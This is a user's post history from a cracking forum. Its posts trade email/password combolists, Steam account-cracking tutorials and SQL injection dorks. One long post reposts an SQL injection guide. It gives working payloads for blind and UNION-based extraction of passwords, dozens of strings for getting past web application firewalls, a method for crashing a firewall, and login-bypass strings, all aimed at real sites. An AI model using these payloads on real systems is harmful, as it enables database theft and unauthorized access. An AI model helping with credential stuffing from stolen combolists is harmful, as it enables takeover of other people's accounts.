Mac Miller
Members-
Content Count
322 -
Last visited
Content Type
Profiles
Forums
Calendar
Gallery
Blogs
Store
Articles
Downloads
Classifieds
Everything posted by Mac Miller
-
email pass 4500 Gaming All Email Access Combos
Mac Miller replied to Mac Miller's topic in Combolists
reported idiot enjoy getting banned! -
does this allow cracking or is it just one of those bad ones that dont
-
[STEAM] GET FREE STEAM KEYS FOREVER! [100+/day]
Mac Miller replied to Doge's topic in Tutorials, Guides, etc.
is this a gen? if it is i hope its a good one dont feel like wasting my time on shitty ones EDIT:not what i though but can still work -
Steam CRACKING TUTORIAL [EASY / FAST / MORE DETAILED]
Mac Miller replied to tamboza's topic in Cracking Tutorials
just released a great steam combo if you need one for an example just wanting to check out the latest HQ tuts Edit:very HQ for checking fast ive done this method before and its awesome -
Just Checked :feelsgood: No Leechers :fyou: [hide]Click Here[/hide]
-
I used to use SQLI dumper all the time and it only used 35-45% cpu. Ive tried every version it still does it. Please help out if you can :smart: :pepo: If you can fix my problem i will give you HQ fortnite dorks :fiesta: :fiesta:
-
What do you think would happen I think it would float into the airvent and make everyone pegnant :pepo: :pepo: :pepo: :pepo:
-
windows 10 dual boot kali linux
-
Halloween award just went live, reply to this post for a chance to get it.
Mac Miller replied to Andreas's topic in Lounge
yay maybe i will get the bat i already got the pumkin :)))) -
I got the pumkin award :)
-
:pepo: :pepo: :pepo: :pepo: :pepo: :pepo: :pepo: :pepo:
-
sometimes sometimes not it depends in my mood
-
im jewish and its awesome i love hacking
-
Baja Fresh is da best
-
the maps are pretty good like firing rang
-
got to be my lucky 13 got to be my lucky 14 got to be my lucky 15 got to be my lucky 16 got to be my lucky 17 got to be my lucky 18 got to be my lucky 19 got to be my lucky 20 got to be my lucky 1 got to be my lucky 2 got to be my lucky 3 got to be my lucky 4 got to be my lucky 5 got to be my lucky 6 got to be my lucky 7 got to be my lucky 8 got to be my lucky 9 got to be my lucky 10 got to be my lucky 11 got to be my lucky 12 There were no rules on doing this :feelsgood: :pepo:
-
Just Wanted to help you people out who do sqli by hand and not automated, this is not my tut all credit goes to original owner [hide]Original Link-Lol Click Here SQLi A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. SQL Injection – Basic Concepts There are two types of SQL Injection • SQL Injection into a String/Char parameter Example: SELECT * from table where example = 'Example' • SQL Injection into a Numeric parameter Example: SELECT * from table where id = 123 Exploitation of SQL Injection vulnerabilities is divided into classes according to the DBMS type and injection conditions. • A vulnerable request can get into Insert, Update, Delete, etc. Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--' Blind SQL Injection Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(200000,md5(now()))) SLEEP(5)-- SELECT BENCHMARK(1000000,MD5('A')); id=1 OR SLEEP(25)=0 LIMIT 1-- id=1) OR SLEEP(25)=0 LIMIT 1-- id=1' OR SLEEP(25)=0 LIMIT 1-- id=1') OR SLEEP(25)=0 LIMIT 1-- id=1)) OR SLEEP(25)=0 LIMIT 1-- id=SELECT SLEEP(25)-- Exploitation features for various DBMSs Example: (MySQL): SELECT * from table where id = 1 union select 1,2,3 Example: (PostgreSQL): SELECT * from table where id = 1; select 1,2,3 Bypassing WAF: SQL Injection - Normalization Method Example Number (1) of a vulnerability in the function of request Normalization. • The following request doesn’t allow anyone to conduct an attack /?id=1+union+select+1,2,3/* • If there is a corresponding vulnerability in the WAF, this request will be successfully performed /?id=1/*union*/union/*select*/select+1,2,3/* • After being processed by WAF, the request will become index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/* The given example works in case of cleaning of dangerous traffic, not in case of blocking the entire request or the attack source. Example Number (2) of a vulnerability in the function of request Normalization. • Similarly, the following request doesn’t allow anyone to conduct an attack /?id=1+union+select+1,2,3/* • If there is a corresponding vulnerability in the WAF, this request will be successfully performed /?id=1+un/**/ion+sel/**/ect+1,2,3-- • The SQL request will become SELECT * from table where id =1 union select 1,2,3-- Instead of construction /**/, any symbol sequence that WAF cuts off can be used (e.g., #####, %00). The given example works in case of excessive cleaning of incoming data (replacement of a regular expression with the empty string). 'Using HTTP Parameter Pollution (HPP)' • The following request doesn’t allow anyone to conduct an attack /?id=1;select+1,2,3+from+users+where+id=1-- • This request will be successfully performed using HPP /?id=1;select+1&id=2,3+from+users+where+id=1-- Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked. EU09 Luca Carettoni, Stefano diPaola. https://www.owasp.org/images/5/5e/Sqli-HPP.png[/img] Using HTTP Parameter Pollution (HPP) • Vulnerable code SQL=" select key from table where id= "+Request.QueryString("id") • This request is successfully performed using the HPP technique /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users • The SQL request becomes select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users ByPassing WAF: SQL Injection – HPF Using HTTP Parameter Fragmentation (HPF) • Vulnerable code example Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']); Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']); • The following request doesn’t allow anyone to conduct an attack /?a=1+union+select+1,2/* • These requests may be successfully performed using HPF /?a=1+union/*&b=*/select+1,2 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users-- • The SQL requests become select * from table where a=1 union/* and b=*/select 1,2 select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users-- Bypassing WAF: Blind SQL Injection Using logical requests AND/OR • The following requests allow one to conduct a successful attack for many WAFs /?id=1+OR+0x50=0x50 /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74 Negation and inequality signs (!=, <>, <, >) can be used instead of the equality one – It is amazing, but many WAFs miss it! It becomes possible to exploit the vulnerability with the method of blind-SQL Injection by replacing SQL functions that get to WAF signatures with their synonyms. substring() -> mid(), substr() ascii() -> hex(), bin() benchmark() -> sleep() Wide variety of logical requests. and 1 or 1 and 1=1 and 2<3 and 'a'='a' and 'a'<>'b' and char(32)=' ' and 3<=2 and 5<=>4 and 5<=>5 and 5 is null or 5 is not null .... An example of various request notations with the same meaning. select user from mysql.user where user = 'user' OR mid(password,1,1)='*' select user from mysql.user where user = 'user' OR mid(password,1,1)=0x2a select user from mysql.user where user = 'user' OR mid(password,1,1)=unhex('2a') select user from mysql.user where user = 'user' OR mid(password,1,1) regexp ' [*]' select user from mysql.user where user = 'user' OR mid(password,1,1) like '*' select user from mysql.user where user = 'user' OR mid(password,1,1) rlike ' [*]' select user from mysql.user where user = 'user' OR ord(mid(password,1,1))=42 select user from mysql.user where user = 'user' OR ascii(mid(password,1,1))=42 select user from mysql.user where user = 'user' OR find_in_set('2a',hex(mid(password,1,1)))=1 select user from mysql.user where user = 'user' OR position(0x2a in password)=1 select user from mysql.user where user = 'user' OR locate(0x2a,password)=1 Known: substring((select 'password'),1,1) = 0x70 substr((select 'password'),1,1) = 0x70 mid((select 'password'),1,1) = 0x70 New: strcmp(left('password',1), 0x69) = 1 strcmp(left('password',1), 0x70) = 0 strcmp(left('password',1), 0x71) = -1 STRCMP(expr1,expr2) returns 0 if the strings are the same, -1 if the first , argument is smaller than the second one, and 1 otherwise. An example of signature bypass. The following request gets to WAF signature [*] /?id=1+union+(select+1,2+from+users) But sometimes, the signatures used can be bypassed /?id=1+union+(select+'xz'from+xxx) /?id=(1)union(select(1),mid(hash,1,32)from(users)) /?id=1+union+(select'1',concat(login,hash)from+users) /?id=(1)union(((((((select(1),hex(hash)from(users)))))))) /?id=(1)or(0x50=0x50) An SQL Injection attack can successfully bypass the WAF , and be conducted in all following cases: • Vulnerabilities in the functions of WAF request normalization. • Application of HPP and HPF techniques. • Bypassing filter rules (signatures). • Vulnerability exploitation by the method of blind SQL Injection. • Attacking the application operating logics (and/or) WAF Bypassing Strings. /*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ concat(0x223e,@@version) concat(0x273e27,version(),0x3c212d2d) concat(0x223e3c62723e,version(),0x3c696d67207372633d22) concat(0x223e,@@version,0x3c696d67207372633d22) concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e) concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22) concat(‘’,@@version,’’) /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ +UnIOn%0d%0aSeleCt%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?+un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+ Union Select by PASS with Url Encoded Method: %55nion(%53elect) union%20distinct%20select union%20%64istinctRO%57%20select union%2053elect %23?%0auion%20?%23?%0aselect %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect %55nion %53eLEct u%6eion se%6cect unio%6e %73elect unio%6e%20%64istinc%74%20%73elect uni%6fn distinct%52OW s%65lect %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7 Illegal mix of Collations ByPass Method : unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))) /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037) union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)? Bypass with Comments SQL comments allow us to bypass a lot of filtering and WAFs. Code : http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3-- Case Changing Some WAFs filter only lowercase SQL keyword. Regex Filter: /union\sselect/g http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3-- Replaced Keywords Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily. http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3-- Some case SQL keyword was filtered out and replaced with whitespace. So we can use "%0b" to bypass. http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3-- For Mod_rewrite, Comments "/**/" cannot bypassed. So we use "%0b" replace "/**/". Forbidden: http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html Bypassed : http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html Advanced Methods Crash Firewall via doing Buffer Over Flow. 1) Buffer Overflow / Firewall Crash: Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow. http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…. You can test if the WAF can be crashed by typing: ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4…. If you get a 500, you can exploit it using the Buffer Overflow Method. 2) Replace Characters with their HEX Values: We can replace some characters with their HEX (URL-Encoded) Values. Example: http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…. (which means “union select”) 4) Misc Exploitable Functions: Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!): Example: This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this: http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4… (If the Firewall removes the “*”, the result will be: 15+union+select….) So, if you find such a silly function, you can exploit it, in this way. Auth Bypass If we need to bypass some admin panels, and we do that using or 1=1. Code: or 1-- -' or 1 or '1"or 1 or" SELECT * FROM login WHERE id=1 or 1-- -' or 1 or '1"or 1 or" AND username= AND password= the "or 1-- -" gets active, make the condition true and ignores the rest of the query. now lets check regular string- SELECT * FROM login WHERE username=' or 1-- -' or 1 or '1"or 1 or" ' ..... the "or 1" part make the query true, and the other parts are considered as the comparison strings. same with the double quotes. SELECT * FROM login WHERE username=" or 1-- -' or 1 or '1"or 1 or" " [/hide]
-
First Hope this is better than all the other leeched ones! Will test and edit this post when i get home!
-
oh damn nice crack hope these hash and dorking tools help me +1 liked
-
I'm not here for the proxies I'm just here to tell you that your title is wrong you have html its suppost to be http/s
-
Steam CRACKING TUTORIAL [EASY / FAST / MORE DETAILED]
Mac Miller replied to tamboza's topic in Cracking Tutorials
this didnt come up in the search engine finally i found it